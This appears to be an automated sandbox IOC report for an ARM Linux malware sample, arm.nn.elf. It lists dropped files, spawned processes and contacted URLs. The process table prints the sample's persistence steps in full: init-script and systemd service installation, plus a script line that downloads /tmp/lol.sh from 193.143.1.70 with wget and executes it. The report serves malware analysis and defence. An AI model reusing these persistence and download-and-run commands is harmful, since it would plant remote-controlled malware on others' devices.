IOC Report
arm.nn.elf

Files

File Path | Type | Category | Malicious
arm.nn.elf | ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped | initial sample | malicious
/etc/init.d/arm.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/mybinary | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped |
/etc/inittab | ASCII text | dropped |
/etc/motd | ASCII text | dropped |
/etc/systemd/system/custom.service | ASCII text | dropped |
/memfd:snapd-env-generator (deleted) | ASCII text | dropped |
/tmp/qemu-open.FhfHuq (deleted) | data | dropped |

Processes

Path | Cmdline | Malicious
/tmp/arm.nn.elf | /tmp/arm.nn.elf |
/tmp/arm.nn.elf | - |
/tmp/arm.nn.elf | - |
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/systemctl | systemctl enable custom.service |
/tmp/arm.nn.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/mybinary |
/tmp/arm.nn.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary |
/tmp/arm.nn.elf | - |
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf" |
/tmp/arm.nn.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/arm.nn.elf |
/tmp/arm.nn.elf | - |
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/mkdir | mkdir -p /etc/rc.d |
/tmp/arm.nn.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf |
/tmp/arm.nn.elf | - |
/tmp/arm.nn.elf | - |
/tmp/arm.nn.elf | - |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/libexec/gnome-session-binary | - |
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping |
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/systemd/systemd | - |
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |

URLs

Name | IP | Malicious
http://193.143.1.70/curl.sh | unknown |
http://193.143.1.70/lol.sh | unknown |
http://193.143.1.70/ | unknown |

IPs

IP | Domain | Country | Malicious

Memdumps

Base Address | Regiontype | Protect | Malicious